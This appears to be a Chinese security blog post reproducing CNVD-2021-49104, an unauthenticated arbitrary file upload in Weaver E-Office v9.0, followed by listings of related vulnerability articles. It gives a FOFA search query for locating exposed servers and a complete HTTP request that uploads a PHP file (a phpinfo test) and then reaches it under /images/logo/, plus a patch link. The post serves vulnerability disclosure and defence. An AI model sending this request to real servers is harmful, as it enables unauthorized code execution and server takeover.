泛微E-Office v9任意文件上传(CNVD-2021-49104)复现

最新推荐文章于 2024-08-18 10:29:23 发布
最新推荐文章于 2024-08-18 10:29:23 发布
阅读量3.1k 收藏 7
点赞数
文章标签: php http java python 信息安全
原文链接:https://mp.weixin.qq.com/s?__biz=MzAwNzkzMzYzMg==&mid=2247484482&idx=1&sn=5b4757276b09d8c3774d98aa67f241cd&chksm=9b77dfedac0056fb03c77606da677271959a97f8fc656de9f4c2e9fb3d64b2aaa18fdfed9343&scene=126&&sessionid=0
版权

0x00 漏洞概况

泛微e-office是一款标准化的协同OA办公软件,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。由于泛微E-Office未能正确处理上传模块中输入的数据,未授权的攻击者可以构造恶意数据包发送给服务器,实现任意文件上传,并且获得服务器的webshell,成功利用该漏洞可以获取服务器控制权。

0x01 影响范围

泛微 e-office v9.0

0x02 FOFA语法

app="泛微-EOffice"

47607cef08d0b745fe2b98f29bd968fa.png

0x03 漏洞复现

构造请求上传文件即可

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 193
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4


--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg


<?php phpinfo();?>


--e64bdf16c554bbc109cecef6451c26a4--

85652ed91ca29dd2132d4c35f519c9eb.png

上传成功后访问 /images/logo/logo-eoffice.php 

dad9983b12f20b4b3768315d29ee8138.png

0x04 修复建议

厂商已提供漏洞修补方案,建议用户下载使用:

http://v10.e-office.cn/eoffice9update/safepack.zip

长按下方图片关注我们:

82014a688b8f6ca111d789235ac0c53f.jpeg

xju_lr
关注
【漏洞复现 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
李火火的安全圈
11-29 5511
0x01 漏洞概述 e-office旗下的一款标准的协同移动办公平台。 e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可利用该漏洞获取服务器控制权。 0x02 影响范围 e-office V9.0 0x03 漏洞复现 访问界面如下 ...
e-cology9前台文件上传漏洞复现
afei001
04-25 2990
目录 1.前言 2.漏洞概述 3.漏洞原理 4.影响版本 5.漏洞等级 6.漏洞复现 6.1 FOFA实战复现 6.2 ecology9_front-desk_fileUpload_POC 7.漏洞修复 声明:以下脚本具有攻击性,请勿非法使用,否则后果自负。请勿进行非授权测试,否则后果自负。 1.前言 2021HW期间,除了爆出e-cology8前台sql注入漏洞,还有就是e-cology9前台文件上传漏洞,CNVD上搜索,最近时间的文件上传漏洞就是...
Silentsoul04#vulnerability-paper-1#OA9前台任意文件上传1
07-25
OA9前台任意文件上传漏洞位于: /page/exportImport/uploadOperation.jsp文件中Jsp流程大概是:判断请求是否是mult
E-office9 action_upload.php任意文件上传漏洞
Keepb1ue的博客
12-29 2247
E-office是⼀款针对中小型组织开发的轻量级OA产品,具有开箱即用、应用丰富、配置灵活的特点,能够满足日常办公审批、考勤、流程、知识文档、公文、人事、即时通讯等需求。同时,它支持私有云部署,确保数据安全可控,并可以在PC端、APP、企业信、钉钉等多个平台上使用。OA E-Office 在 action_upload.php上传文件过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限。
e-office 9.0 160125全版升级包
11-05
e-office 9.0 升级安装包,便于e-office 9.0更好的使用。更新内容详见官网说明。
eoffice9.0从头到尾全套视频教程
01-08
eoffice9.0从头到尾全套视频教程讲述了OA办公软件的实用性,讲述每个模块的功能的使用操作和设置。由于是视频文件比较大下载好后大家可以在提供的百度网盘内下载。
漏洞通报:V9任意文件上传
热门推荐
土豆的博客
12-06 7万+
——D&X安全实验室 目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 (1)环境搭建 (2)构造POC (3)漏洞验证 Part5 修复建议 Part1 漏洞描述 e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。 该漏洞是由于后端源码中uploadType 参数设为 ...
e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
Ms08067安全实验室
12-14 6257
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web漏洞挖掘班讲师)参考:https://cnvd.org.cn/flaw/show/CNVD-2021-49104 ...
【漏洞复现OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
李火火的安全圈
05-10 3353
协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。新一代移动办公平台E-Cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件,实体签章的方式,OA E-Cology平台browser.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
OA e-cology9 存在 sql 注入
nnn2188185的博客
04-29 1641
信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发 E-Cology9 协同办公系统是一套基于 JSP 及 SQL Server 数据库的 OA 系统,包括知识文档管理、人力资源管理、客户关系管理、项目管理、财务管理、工作流程管理、数据中心等打造协同高效的企业管理环境,突破企业人、财、物、信息、流程等各种资源之间的屏障,并将集团各企业、企业各部门、各分支机构、以及企业与外部的供应商、分销商、客户及其他合作伙伴等整合在一个统一的平台上,使企业变成一个电子化的内外部协同工作的组织。
e-office9.0 信公众平台设置说明文档.docx
08-17
e-office9.0 信公众平台设置说明文档.docx
ecology9.0 文档(DocService)WebService接口使用说明
02-15
ecology9.0 文档(DocService)WebService接口使用说明
Fanwei-OA-V9-arbitrary-file-upload
04-13
Fanwei-OA-V9-arbitrary-file-upload 仅供测试
协同办公OA管理系统==完美破解无限制
01-08
协同办公OA管理系统==完美破解无限制(2011、12、26更新)
e-officev10.0_20180913标准补丁程序(适用于v10.0_20180119及以上版本)
11-12
e-officev10.0_20180913标准补丁程序(适用于v10.0_20180119及以上版本)
ecology9二次开发-附件上传接口
weixin_53964368的博客
10-18 6685
ID为21的附件对应25,26,27;ID为22的附件对应31,32,33,我们可以发现数据库中存储的是其实是id数组。2.接口代码可以复用,只要在调用接口时将对应的文档存储id存储到请求头中就行。最后我这里根据项目组古早的代码中获取了关键信息,代码我就直接贴上来了。这时候我们可以打开数据库管理工具,查看对应数据库中的内容。首先,我们可以在本地环境创建一个仅有附件的表单。我这里的表单对应的是数据库表名uf_fjcs。然后我们再创建对应的模块和查询。1.代码中的dirId为。
【漏洞复现-云桥e-Bridge EC8.0 文件上传
今天是几号的博客
08-06 2564
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。-云桥是一款基于云计算技术的企业级协作与办公平台,提供文档管理、流程审批、项目协作等功能,旨在提升企业内部沟通效率与工作协同能力。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
云桥前台文件上传漏洞-202408
最新发布
网络安全。
08-18 1728
静态分析代码流程:先看方法有没有声明,没有声明使用 jd-gui 反编译工具 search 搜索要跳转的类方法,定位到后再去 idea 里查看有无声明,再无声明可结合 jd-gui、jar-analyzer工具搜索查找。动态分析:每一步都可以打断点动态分析一下,可以随时在每一步骤中用到的方法进行断点分析。
E-office Server_v9.0 漏洞分析
蚁景网安学院
09-28 750
e-office是一款标准化的协同OA办公软件,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。由于 E-Office 未能正确处理上传模块中输入的数据,未授权的攻击者可以构造恶意数据包发送给服务器,实现任意文件上传,并且获得服务器的webshell,成功利用该漏洞可以获取服务器控制权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值